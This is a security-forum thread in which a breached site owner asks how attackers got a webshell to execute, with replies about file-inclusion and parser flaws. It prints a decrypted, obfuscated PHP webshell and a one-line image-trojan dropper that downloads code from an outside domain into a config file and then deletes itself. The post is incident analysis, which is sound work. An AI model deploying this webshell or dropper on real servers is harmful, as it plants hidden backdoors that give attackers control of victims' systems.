首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 看雪峰会 看雪商城 证书查询
  1. 社区
  2. 付费问答
    3. 发新帖
[已解决] [求助] 服务器被入侵有日志这些求入侵过程 300.00雪花
发表于: 2020-8-25 18:11 2782

[已解决] [求助] 服务器被入侵有日志这些求入侵过程 300.00雪花

漠北蝈蝈 活跃值
2020-8-25 18:11
2782

<?php
/* 本程序由 Ranyun_JieMi_EnphpV1 3.0算法解密 */
?><?php

/* -- mzphp 混淆加密:https://git.oschina.net/mz/mzphp2 */
error_reporting(E_ALL ^ E_NOTICE);
error_reporting(E_ERROR | E_PARSE);
@set_time_limit(0);
header('content-Type: text/html; charset=gb2312');
if (isset($_COOKIE['PHPSSESID']) == !1) {
    exit;
}
$c = 'ch' . 'r';
$b = $c(98) . $c(97) . $c(115) . $c(101) . $c(54) . $c(52) . $c(95) . 'd' . $c(101) . $c(99) . $c(111) . $c(100) . $c(101);
$r = $b('cHJlZ19yZXBsYWNl');
$f = $b('Y3JlYXRlX2Z1bmN0aW9u');
if ($_COOKIE['PHPSSESID'] == $b('c3dhbg==')) {
    $html = $b('JHBhc3N3b3JkPSdzd2FuJzs=') . '@e#html' . $c(118) . $c(97) . $b('bChnemluZmxhdGUo') . $b . '("jVRpb9pAEP0eKf9hY6HYlmi4EqQWWUrUOhSlmOCDFKrKWuwBr7J4Xe9Sjor/3jWQYA617Bdr53jz5u2MIU1Z6qeQsFSQeKyV9cblRQQ4hFRTAhYLiMUHd5HAJyRgLkqRmNAGCiKcchDGeFitVapKlsOBc8JinwucCi2zkBHSrgiXcVrBd0zHaXWsH0oSJRyY8lPX0Z/LCyRPIUAGUtXG9jblkOKxLJtZ22xJKMWl25sy0gI2SbAgQwoN1HZaJqrflBvohcQhm3FkuejupqrvcFIqEYaYQ/3WDyFgIWj7N6XvRU67aZnD2qDdrnaXg6+vFfxi93Et7PTMctltVjqhN69738NOd9mb9nvh4LlrGIqu56pYMDOQUkpeP/56erJILVkMyKSkbCPWKnCRJoxrhaD4lqGj62s0msaByESDOeGCa2ognT6JiVD/4Yc5BOpOvo2Ekez1PVt7o5edtVU+AkvkOwRREX327G+dZ9eXnw2ds6LdVtvseG4RVe7OirdN17Mt136wnEfTLiLX9szzaDmm/dA0LbeYm4V85npe3pXIko9wA8o45D2r/z+GFM4fy1lVMaVs5mcwI5ZAfCi1gEnCJYP7EaGyxoF+6woyQiy0TaSu75zv7O/JJKHZCKpqcYt4BJKjqYRAv5D0IQ4fZU3lNGRGJ2vA324t3+OWE+BU/1eGgUaYctjv9XhtZaXxksQjisXhOhUCPVdttfkBnLH/8BvTkxESbPUX' . $b('IikpKTs7');
    $e = @$f('', $r('/#html/', '', $html));
    $e();
} else {
    $html = '@e#html' . $c(118) . $c(97) . $b('bChnemluZmxhdGUo') . $b . '("c0gtS8zRSK/KzEvLSSxJ1UhKLE41M4lPSU3OT0nVUIl39vf39nSNVg/wCAgOdg32dFGP1dTUtAYA' . $b('IikpKTs7');
    $e = @$f('', $r('/#html/', '', $html));
    $e();
}
exit;

这是小马解密过的,需要cookie才能访问

 

通过论坛老哥分析是通过ueditor编辑器插件上传的jpg图片马,
http://1.142ozgx.cn/Public/static/ueditor/这是编辑器地址,确实可以上传图片马,但是他是怎么解析的喃?

<?php file_put_contents('./Addons/Attachment/config.php',file_get_contents('http://www.hhgyrt.space/pic.txt'));unlink('test1.php')?>

这是图片马的内容,把webshell写入到文件夹了

 

最主要的一个问题他是怎么解析的这个图片?
怎么执行的?
来个老哥分析下过程

 

https://wwa.lanzous.com/ic2Xsfyqwuh 日志文件和木马都在里面


[课程]Linux pwn 探索篇!

最后于 2020-8-27 14:16 被漠北蝈蝈编辑 ,原因:
收藏
免费 0
支持
分享
最新回复 (7)
漠北蝈蝈
雪    币: 73
活跃值: (281)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
2
@CCkicker    怎么不审核
2020-8-29 15:14
0
webappsec
雪    币: 1217
活跃值: (606)
能力值: ( LV3,RANK:30 )
在线值:
发帖
回帖
粉丝
私信
3
(1)上传上去,不代表黑客可以解析,告警短信应该是检测到jpg文件的内容存在恶意代码,所以告警;
(2)通过文件包含漏洞来进行解析,这个就需要看你的网站是不是存在类似的漏洞,可以通过access_log日志查看是否进行了文件包含:cat access_log | grep "xxx.jpg"
2020-8-29 16:32
0
漠北蝈蝈
雪    币: 73
活跃值: (281)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
4
webappsec (1)上传上去,不代表黑客可以解析,告警短信应该是检测到jpg文件的内容存在恶意代码,所以告警; (2)通过文件包含漏洞来进行解析,这个就需要看你的网站是不是存在类似的漏洞,可以通过access_l ...
主要是想知道怎么解析的
2020-8-29 19:58
0
逗号man
雪    币: 526
活跃值: (663)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
5
他没有解析,只是上传上去了而已,有可能只是批量. 不知道你的WEB用的什么, 有几个小版本有解析漏洞,你百度一下
2020-8-29 22:25
0
漠北蝈蝈
雪    币: 73
活跃值: (281)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
6
逗号man 他没有解析,只是上传上去了而已,有可能只是批量. 不知道你的WEB用的什么, 有几个小版本有解析漏洞,你百度一下
上传上去并且执行了的,因为他的webshell已经成功下载到我的服务器了,阿帕奇和ngx都会被入侵执行
2020-8-29 23:17
0
漠北蝈蝈
雪    币: 73
活跃值: (281)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
7
没人解答自己找到了
2020-8-30 23:54
0
wx_三五瓶
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
私信
(+300.00雪花)
8
自己找到方法了,已经解决了
2020-8-30 23:56
(+300.00雪花)
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回
//